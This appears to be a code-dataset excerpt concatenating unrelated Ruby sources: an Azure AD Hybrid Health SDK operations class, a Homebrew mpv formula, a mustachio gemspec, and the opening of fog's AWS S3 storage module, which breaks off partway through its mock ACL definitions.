# Gets the details of the Active Directory Domain servers, for a given Active
# Directory Domain Service, that are onboarded to Azure Active Directory
# Connect Health.
#
# @param service_name [String] The name of the service.
# @param filter [String] The server property filter to apply.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Array<AddsServiceMember>] operation results.
#
def list(service_name, filter:nil, custom_headers:nil)
first_page = list_as_lazy(service_name, filter:filter, custom_headers:custom_headers)
first_page.get_all_items
end
#
# Gets the details of the Active Directory Domain servers, for a given Active
# Directory Domain Service, that are onboarded to Azure Active Directory
# Connect Health.
#
# @param service_name [String] The name of the service.
# @param filter [String] The server property filter to apply.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def list_with_http_info(service_name, filter:nil, custom_headers:nil)
list_async(service_name, filter:filter, custom_headers:custom_headers).value!
end
#
# Gets the details of the Active Directory Domain servers, for a given Active
# Directory Domain Service, that are onboarded to Azure Active Directory
# Connect Health.
#
# @param service_name [String] The name of the service.
# @param filter [String] The server property filter to apply.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def list_async(service_name, filter:nil, custom_headers:nil)
fail ArgumentError, 'service_name is nil' if service_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'providers/Microsoft.ADHybridHealthService/addsservices/{serviceName}/addsservicemembers'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'serviceName' => service_name},
query_params: {'$filter' => filter,'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::ADHybridHealthService::Mgmt::V2014_01_01::Models::AddsServiceMembers.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Gets the details of a server, for a given Active Directory Domain Controller
    # service, that is onboarded to Azure Active Directory Connect Health Service.
#
# @param service_name [String] The name of the service.
# @param service_member_id The server Id.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [ServiceMember] operation results.
#
def get(service_name, service_member_id, custom_headers:nil)
response = get_async(service_name, service_member_id, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Gets the details of a server, for a given Active Directory Domain Controller
    # service, that is onboarded to Azure Active Directory Connect Health Service.
#
# @param service_name [String] The name of the service.
# @param service_member_id The server Id.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def get_with_http_info(service_name, service_member_id, custom_headers:nil)
get_async(service_name, service_member_id, custom_headers:custom_headers).value!
end
#
# Gets the details of a server, for a given Active Directory Domain Controller
    # service, that is onboarded to Azure Active Directory Connect Health Service.
#
# @param service_name [String] The name of the service.
# @param service_member_id The server Id.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def get_async(service_name, service_member_id, custom_headers:nil)
fail ArgumentError, 'service_name is nil' if service_name.nil?
fail ArgumentError, 'service_member_id is nil' if service_member_id.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'providers/Microsoft.ADHybridHealthService/addsservices/{serviceName}/servicemembers/{serviceMemberId}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'serviceName' => service_name,'serviceMemberId' => service_member_id},
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::ADHybridHealthService::Mgmt::V2014_01_01::Models::ServiceMember.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
    # Deletes an Active Directory Domain Controller server that has been onboarded
# to Azure Active Directory Connect Health Service.
#
# @param service_name [String] The name of the service.
# @param service_member_id The server Id.
# @param confirm [Boolean] Indicates if the server will be permanently deleted
# or disabled. True indicates that the server will be permanently deleted and
# False indicates that the server will be marked disabled and then deleted
# after 30 days, if it is not re-registered.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
#
def delete(service_name, service_member_id, confirm:nil, custom_headers:nil)
response = delete_async(service_name, service_member_id, confirm:confirm, custom_headers:custom_headers).value!
nil
end
#
    # Deletes an Active Directory Domain Controller server that has been onboarded
# to Azure Active Directory Connect Health Service.
#
# @param service_name [String] The name of the service.
# @param service_member_id The server Id.
# @param confirm [Boolean] Indicates if the server will be permanently deleted
# or disabled. True indicates that the server will be permanently deleted and
# False indicates that the server will be marked disabled and then deleted
# after 30 days, if it is not re-registered.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def delete_with_http_info(service_name, service_member_id, confirm:nil, custom_headers:nil)
delete_async(service_name, service_member_id, confirm:confirm, custom_headers:custom_headers).value!
end
#
    # Deletes an Active Directory Domain Controller server that has been onboarded
# to Azure Active Directory Connect Health Service.
#
# @param service_name [String] The name of the service.
# @param service_member_id The server Id.
# @param confirm [Boolean] Indicates if the server will be permanently deleted
# or disabled. True indicates that the server will be permanently deleted and
# False indicates that the server will be marked disabled and then deleted
# after 30 days, if it is not re-registered.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def delete_async(service_name, service_member_id, confirm:nil, custom_headers:nil)
fail ArgumentError, 'service_name is nil' if service_name.nil?
fail ArgumentError, 'service_member_id is nil' if service_member_id.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'providers/Microsoft.ADHybridHealthService/addsservices/{serviceName}/servicemembers/{serviceMemberId}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'serviceName' => service_name,'serviceMemberId' => service_member_id},
query_params: {'confirm' => confirm,'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:delete, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
result
end
promise.execute
end
#
    # Gets the credentials of the server which are needed by the agent to connect to
# Azure Active Directory Connect Health Service.
#
# @param service_name [String] The name of the service.
# @param service_member_id The server Id.
# @param filter [String] The property filter to apply.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Credentials] operation results.
#
def list_credentials(service_name, service_member_id, filter:nil, custom_headers:nil)
response = list_credentials_async(service_name, service_member_id, filter:filter, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
    # Gets the credentials of the server which are needed by the agent to connect to
# Azure Active Directory Connect Health Service.
#
# @param service_name [String] The name of the service.
# @param service_member_id The server Id.
# @param filter [String] The property filter to apply.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def list_credentials_with_http_info(service_name, service_member_id, filter:nil, custom_headers:nil)
list_credentials_async(service_name, service_member_id, filter:filter, custom_headers:custom_headers).value!
end
#
    # Gets the credentials of the server which are needed by the agent to connect to
# Azure Active Directory Connect Health Service.
#
# @param service_name [String] The name of the service.
# @param service_member_id The server Id.
# @param filter [String] The property filter to apply.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def list_credentials_async(service_name, service_member_id, filter:nil, custom_headers:nil)
fail ArgumentError, 'service_name is nil' if service_name.nil?
fail ArgumentError, 'service_member_id is nil' if service_member_id.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'providers/Microsoft.ADHybridHealthService/addsservices/{serviceName}/servicemembers/{serviceMemberId}/credentials'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'serviceName' => service_name,'serviceMemberId' => service_member_id},
query_params: {'$filter' => filter,'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::ADHybridHealthService::Mgmt::V2014_01_01::Models::Credentials.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Gets the details of the Active Directory Domain servers, for a given Active
# Directory Domain Service, that are onboarded to Azure Active Directory
# Connect Health.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [AddsServiceMembers] operation results.
#
def list_next(next_page_link, custom_headers:nil)
response = list_next_async(next_page_link, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Gets the details of the Active Directory Domain servers, for a given Active
# Directory Domain Service, that are onboarded to Azure Active Directory
# Connect Health.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def list_next_with_http_info(next_page_link, custom_headers:nil)
list_next_async(next_page_link, custom_headers:custom_headers).value!
end
#
# Gets the details of the Active Directory Domain servers, for a given Active
# Directory Domain Service, that are onboarded to Azure Active Directory
# Connect Health.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def list_next_async(next_page_link, custom_headers:nil)
fail ArgumentError, 'next_page_link is nil' if next_page_link.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = '{nextLink}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
skip_encoding_path_params: {'nextLink' => next_page_link},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::ADHybridHealthService::Mgmt::V2014_01_01::Models::AddsServiceMembers.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Gets the details of the Active Directory Domain servers, for a given Active
# Directory Domain Service, that are onboarded to Azure Active Directory
# Connect Health.
#
# @param service_name [String] The name of the service.
# @param filter [String] The server property filter to apply.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [AddsServiceMembers] which provide lazy access to pages of the
# response.
#
def list_as_lazy(service_name, filter:nil, custom_headers:nil)
response = list_async(service_name, filter:filter, custom_headers:custom_headers).value!
unless response.nil?
page = response.body
page.next_method = Proc.new do |next_page_link|
list_next_async(next_page_link, custom_headers:custom_headers)
end
page
end
end
end
end
| 44.581308 | 141 | 0.701061 |
1aa312327f2dcbaa84c22fed447ec6f2e761c16a | 1,762 | class Mpv < Formula
desc "Media player based on MPlayer and mplayer2"
homepage "https://mpv.io"
url "https://github.com/mpv-player/mpv/archive/v0.32.0.tar.gz"
sha256 "9163f64832226d22e24bbc4874ebd6ac02372cd717bef15c28a0aa858c5fe592"
head "https://github.com/mpv-player/mpv.git"
bottle do
sha256 "dd0fe84dea1268524e18d210595e31b295906e334ae8114124b94a94d130de60" => :catalina
sha256 "22c3aa2fb8ec77b5125c836badf0ad7889b512280f54f310c5a6ab8e77099fa6" => :mojave
sha256 "0477b20f9a166d746d84c2a7d0b191159c6825512fe66c38ddf9ca6c43403d97" => :high_sierra
end
depends_on "docutils" => :build
depends_on "pkg-config" => :build
depends_on "python" => :build
depends_on :xcode => :build
depends_on "ffmpeg"
depends_on "jpeg"
depends_on "libarchive"
depends_on "libass"
depends_on "little-cms2"
depends_on "[email protected]"
depends_on "mujs"
depends_on "uchardet"
depends_on "vapoursynth"
depends_on "youtube-dl"
def install
# LANG is unset by default on macOS and causes issues when calling getlocale
# or getdefaultlocale in docutils. Force the default c/posix locale since
# that's good enough for building the manpage.
ENV["LC_ALL"] = "C"
args = %W[
--prefix=#{prefix}
--enable-html-build
--enable-javascript
--enable-libmpv-shared
--enable-lua
--enable-libarchive
--enable-uchardet
--confdir=#{etc}/mpv
--datadir=#{pkgshare}
--mandir=#{man}
--docdir=#{doc}
--zshdir=#{zsh_completion}
--lua=51deb
]
system "python3", "bootstrap.py"
system "python3", "waf", "configure", *args
system "python3", "waf", "install"
end
test do
system bin/"mpv", "--ao=null", test_fixtures("test.wav")
end
end
| 28.419355 | 93 | 0.689557 |
5d6139778f3e3fbc7ee1c6c4433fc7ff02fb2fec | 4,153 | # Generated by jeweler
# DO NOT EDIT THIS FILE DIRECTLY
# Instead, edit Jeweler::Tasks in Rakefile, and run 'rake gemspec'
# -*- encoding: utf-8 -*-
Gem::Specification.new do |s|
s.name = "mustachio"
s.version = "0.3.0"
s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version=
s.authors = ["Aidan Feldman"]
s.date = "2012-10-10"
s.description = "Adds a 'mustachify' shortcut to magickly."
s.email = "[email protected]"
s.extra_rdoc_files = [
"LICENSE.txt",
"README.md"
]
s.files = [
".document",
".rspec",
"Gemfile",
"Gemfile.lock",
"LICENSE.txt",
"README.md",
"Rakefile",
"VERSION",
"bookmarklet.js",
"config.ru",
"config/staches.yml",
"lib/mustachio.rb",
"lib/mustachio/app.rb",
"lib/mustachio/factories.rb",
"lib/mustachio/public/favicon.ico",
"lib/mustachio/public/images/dubya.jpeg",
"lib/mustachio/public/images/guy_hecker.jpeg",
"lib/mustachio/public/images/staches/colonel_mustard.png",
"lib/mustachio/public/images/staches/grand-handlebar.png",
"lib/mustachio/public/images/staches/mustache_03.png",
"lib/mustachio/public/images/staches/mustache_03.svg",
"lib/mustachio/public/images/staches/mustache_07.png",
"lib/mustachio/public/images/staches/painters-brush.png",
"lib/mustachio/public/images/staches/petite-handlebar.png",
"lib/mustachio/rekognition.rb",
"lib/mustachio/shortcuts.rb",
"lib/mustachio/views/face_api_dev_challenge.haml",
"lib/mustachio/views/ga.haml",
"lib/mustachio/views/gallery.haml",
"lib/mustachio/views/index.haml",
"lib/mustachio/views/test.haml",
"mustachio.gemspec",
"spec/fixtures/vcr_cassettes/big_obama.yml",
"spec/fixtures/vcr_cassettes/dubya.yml",
"spec/fixtures/vcr_cassettes/small_obama.yml",
"spec/spec_helper.rb",
"spec/support/big_obama.jpeg",
"spec/support/dubya.jpeg",
"spec/support/small_obama.jpeg",
"spec/unit/analyser_spec.rb",
"spec/unit/job_spec.rb",
"spec/unit/magickly_spec.rb"
]
s.homepage = "http://github.com/afeld/mustachio"
s.licenses = ["MIT"]
s.require_paths = ["lib"]
s.rubygems_version = "1.8.24"
s.summary = "automatic mustachifying of any image"
if s.respond_to? :specification_version then
s.specification_version = 3
if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
s.add_runtime_dependency(%q<sinatra>, ["~> 1.2"])
s.add_runtime_dependency(%q<dragonfly>, ["~> 0.9.0"])
s.add_runtime_dependency(%q<magickly>, [">= 0"])
s.add_runtime_dependency(%q<rest-client>, ["~> 1.6"])
s.add_runtime_dependency(%q<addressable>, ["~> 2.2"])
s.add_runtime_dependency(%q<haml>, ["~> 3.0"])
s.add_runtime_dependency(%q<imagesize>, ["~> 0.1"])
s.add_development_dependency(%q<jeweler>, ["~> 1.6"])
s.add_development_dependency(%q<rack-test>, [">= 0"])
s.add_development_dependency(%q<rspec>, ["~> 2.5"])
s.add_development_dependency(%q<debugger>, [">= 0"])
else
s.add_dependency(%q<sinatra>, ["~> 1.2"])
s.add_dependency(%q<dragonfly>, ["~> 0.9.0"])
s.add_dependency(%q<magickly>, [">= 0"])
s.add_dependency(%q<rest-client>, ["~> 1.6"])
s.add_dependency(%q<addressable>, ["~> 2.2"])
s.add_dependency(%q<haml>, ["~> 3.0"])
s.add_dependency(%q<imagesize>, ["~> 0.1"])
s.add_dependency(%q<jeweler>, ["~> 1.6"])
s.add_dependency(%q<rack-test>, [">= 0"])
s.add_dependency(%q<rspec>, ["~> 2.5"])
s.add_dependency(%q<debugger>, [">= 0"])
end
else
s.add_dependency(%q<sinatra>, ["~> 1.2"])
s.add_dependency(%q<dragonfly>, ["~> 0.9.0"])
s.add_dependency(%q<magickly>, [">= 0"])
s.add_dependency(%q<rest-client>, ["~> 1.6"])
s.add_dependency(%q<addressable>, ["~> 2.2"])
s.add_dependency(%q<haml>, ["~> 3.0"])
s.add_dependency(%q<imagesize>, ["~> 0.1"])
s.add_dependency(%q<jeweler>, ["~> 1.6"])
s.add_dependency(%q<rack-test>, [">= 0"])
s.add_dependency(%q<rspec>, ["~> 2.5"])
s.add_dependency(%q<debugger>, [">= 0"])
end
end
| 37.080357 | 105 | 0.633036 |
f7e9c3d5de6f8fc044234d4c212371f81df098b1 | 25,787 | module Fog
module Storage
class AWS < Fog::Service
extend Fog::AWS::CredentialFetcher::ServiceMethods
COMPLIANT_BUCKET_NAMES = /^(?:[a-z]|\d(?!\d{0,2}(?:\.\d{1,3}){3}$))(?:[a-z0-9]|\.(?![\.\-])|\-(?![\.])){1,61}[a-z0-9]$/
DEFAULT_REGION = 'us-east-1'
DEFAULT_SCHEME = 'https'
DEFAULT_SCHEME_PORT = {
'http' => 80,
'https' => 443
}
VALID_QUERY_KEYS = %w[
acl
cors
delete
lifecycle
location
logging
notification
partNumber
policy
requestPayment
response-cache-control
response-content-disposition
response-content-encoding
response-content-language
response-content-type
response-expires
restore
tagging
torrent
uploadId
uploads
versionId
versioning
versions
website
]
requires :aws_access_key_id, :aws_secret_access_key
recognizes :endpoint, :region, :host, :port, :scheme, :persistent, :use_iam_profile, :aws_session_token, :aws_credentials_expire_at, :path_style, :instrumentor, :instrumentor_name, :aws_signature_version
secrets :aws_secret_access_key, :hmac
model_path 'fog/aws/models/storage'
collection :directories
model :directory
collection :files
model :file
request_path 'fog/aws/requests/storage'
request :abort_multipart_upload
request :complete_multipart_upload
request :copy_object
request :delete_bucket
request :delete_bucket_cors
request :delete_bucket_lifecycle
request :delete_bucket_policy
request :delete_bucket_website
request :delete_object
request :delete_multiple_objects
request :delete_bucket_tagging
request :get_bucket
request :get_bucket_acl
request :get_bucket_cors
request :get_bucket_lifecycle
request :get_bucket_location
request :get_bucket_logging
request :get_bucket_object_versions
request :get_bucket_policy
request :get_bucket_tagging
request :get_bucket_versioning
request :get_bucket_website
request :get_bucket_notification
request :get_object
request :get_object_acl
request :get_object_torrent
request :get_object_http_url
request :get_object_https_url
request :get_object_url
request :get_request_payment
request :get_service
request :head_bucket
request :head_object
request :head_object_url
request :initiate_multipart_upload
request :list_multipart_uploads
request :list_parts
request :post_object_hidden_fields
request :post_object_restore
request :put_bucket
request :put_bucket_acl
request :put_bucket_cors
request :put_bucket_lifecycle
request :put_bucket_logging
request :put_bucket_policy
request :put_bucket_tagging
request :put_bucket_versioning
request :put_bucket_website
request :put_bucket_notification
request :put_object
request :put_object_acl
request :put_object_url
request :put_request_payment
request :sync_clock
request :upload_part
module Utils
attr_accessor :region
def cdn
@cdn ||= Fog::AWS::CDN.new(
:aws_access_key_id => @aws_access_key_id,
:aws_secret_access_key => @aws_secret_access_key,
:use_iam_profile => @use_iam_profile
)
end
def http_url(params, expires)
signed_url(params.merge(:scheme => 'http'), expires)
end
def https_url(params, expires)
signed_url(params.merge(:scheme => 'https'), expires)
end
def url(params, expires)
Fog::Logger.deprecation("Fog::Storage::AWS => #url is deprecated, use #https_url instead [light_black](#{caller.first})[/]")
https_url(params, expires)
end
def request_url(params)
params = request_params(params)
params_to_url(params)
end
def signed_url(params, expires)
refresh_credentials_if_expired
          # Convert expires from a point in time to a delta from now.
expires = expires.to_i
if @signature_version == 4
params = v4_signed_params_for_url(params, expires)
else
params = v2_signed_params_for_url(params, expires)
end
params_to_url(params)
end
private
def validate_signature_version!
unless @signature_version == 2 || @signature_version == 4
raise "Unknown signature version #{@signature_version}; valid versions are 2 or 4"
end
end
def v4_signed_params_for_url(params, expires)
now = Fog::Time.now
expires = expires - now.to_i
params[:headers] ||= {}
params[:query]||= {}
params[:query]['X-Amz-Expires'] = expires
params[:query]['X-Amz-Date'] = now.to_iso8601_basic
if @aws_session_token
params[:query]['X-Amz-Security-Token'] = @aws_session_token
end
params = request_params(params)
params[:headers][:host] = params[:host]
signature_query_params = @signer.signature_parameters(params, now, "UNSIGNED-PAYLOAD")
params[:query] = (params[:query] || {}).merge(signature_query_params)
params
end
def v2_signed_params_for_url(params, expires)
if @aws_session_token
params[:headers]||= {}
params[:headers]['x-amz-security-token'] = @aws_session_token
end
signature = signature_v2(params, expires)
params = request_params(params)
signature_query_params = {
'AWSAccessKeyId' => @aws_access_key_id,
'Signature' => signature,
'Expires' => expires,
}
params[:query] = (params[:query] || {}).merge(signature_query_params)
params[:query]['x-amz-security-token'] = @aws_session_token if @aws_session_token
params
end
def region_to_host(region=nil)
case region.to_s
when DEFAULT_REGION, ''
's3.amazonaws.com'
else
"s3-#{region}.amazonaws.com"
end
end
def object_to_path(object_name=nil)
'/' + escape(object_name.to_s).gsub('%2F','/')
end
def bucket_to_path(bucket_name, path=nil)
"/#{escape(bucket_name.to_s)}#{path}"
end
# NOTE: differs from Fog::AWS.escape by NOT escaping `/`
def escape(string)
string.gsub(/([^a-zA-Z0-9_.\-~\/]+)/) {
"%" + $1.unpack("H2" * $1.bytesize).join("%").upcase
}
end
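        # For illustration (example key assumed, not from the original source):
        #
        #   escape('dir/some file.txt') # => "dir/some%20file.txt"
        #
        # whereas Fog::AWS.escape would also percent-encode the '/' separators,
        # per the NOTE above.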
# Transforms things like bucket_name, object_name, region
#
        # Should be idempotent: request_params(request_params(params)) == request_params(params)
def request_params(params)
headers = params[:headers] || {}
if params[:scheme]
scheme = params[:scheme]
port = params[:port] || DEFAULT_SCHEME_PORT[scheme]
else
scheme = @scheme
port = @port
end
if DEFAULT_SCHEME_PORT[scheme] == port
port = nil
end
if params[:region]
region = params[:region]
host = params[:host] || region_to_host(region)
else
region = @region || DEFAULT_REGION
host = params[:host] || @host || region_to_host(region)
end
path = params[:path] || object_to_path(params[:object_name])
path = '/' + path if path[0..0] != '/'
if params[:bucket_name]
bucket_name = params[:bucket_name]
if params[:bucket_cname]
host = bucket_name
else
path_style = params.fetch(:path_style, @path_style)
if !path_style
if COMPLIANT_BUCKET_NAMES !~ bucket_name
Fog::Logger.warning("fog: the specified s3 bucket name(#{bucket_name}) is not a valid dns name, which will negatively impact performance. For details see: http://docs.amazonwebservices.com/AmazonS3/latest/dev/BucketRestrictions.html")
path_style = true
elsif scheme == 'https' && !path_style && bucket_name =~ /\./
Fog::Logger.warning("fog: the specified s3 bucket name(#{bucket_name}) contains a '.' so is not accessible over https as a virtual hosted bucket, which will negatively impact performance. For details see: http://docs.amazonwebservices.com/AmazonS3/latest/dev/BucketRestrictions.html")
path_style = true
end
end
if path_style
path = bucket_to_path bucket_name, path
else
host = [bucket_name, host].join('.')
end
end
end
ret = params.merge({
:scheme => scheme,
:host => host,
:port => port,
:path => path,
:headers => headers
})
#
ret.delete(:path_style)
ret.delete(:bucket_name)
ret.delete(:object_name)
ret.delete(:region)
ret
end
def params_to_url(params)
query = params[:query] && params[:query].map do |key, value|
if value
[key, escape(value.to_s)].join('=')
else
key
end
end.join('&')
URI::Generic.build({
:scheme => params[:scheme],
:host => params[:host],
:port => params[:port],
:path => params[:path],
:query => query,
}).to_s
end
end
class Mock
include Utils
include Fog::AWS::CredentialFetcher::ConnectionMethods
def self.acls(type)
case type
when 'private'
{
"AccessControlList" => [
{
"Permission" => "FULL_CONTROL",
"Grantee" => {"DisplayName" => "me", "ID" => "2744ccd10c7533bd736ad890f9dd5cab2adb27b07d500b9493f29cdc420cb2e0"}
}
],
"Owner" => {"DisplayName" => "me", "ID" => "2744ccd10c7533bd736ad890f9dd5cab2adb27b07d500b9493f29cdc420cb2e0"}
}
when 'public-read'
{
"AccessControlList" => [
{
"Permission" => "FULL_CONTROL",
"Grantee" => {"DisplayName" => "me", "ID" => "2744ccd10c7533bd736ad890f9dd5cab2adb27b07d500b9493f29cdc420cb2e0"}
},
{
"Permission" => "READ",
"Grantee" => {"URI" => "http://acs.amazonaws.com/groups/global/AllUsers"}
}
],
"Owner" => {"DisplayName" => "me", "ID" => "2744ccd10c7533bd736ad890f9dd5cab2adb27b07d500b9493f29cdc420cb2e0"}
}
when 'public-read-write'
{
"AccessControlList" => [
{
"Permission" => "FULL_CONTROL",
"Grantee" => {"DisplayName" => "me", "ID" => "2744ccd10c7533bd736ad890f9dd5cab2adb27b07d500b9493f29cdc420cb2e0"}
},
{
"Permission" => "READ",
"Grantee" => {"URI" => "http://acs.amazonaws.com/groups/global/AllUsers"}
},
{
"Permission" => "WRITE",
"Grantee" => {"URI" => "http://acs.amazonaws.com/groups/global/AllUsers"}
}
],
"Owner" => {"DisplayName" => "me", "ID" => "2744ccd10c7533bd736ad890f9dd5cab2adb27b07d500b9493f29cdc420cb2e0"}
}
when 'authenticated-read'
{
"AccessControlList" => [
{
"Permission" => "FULL_CONTROL",
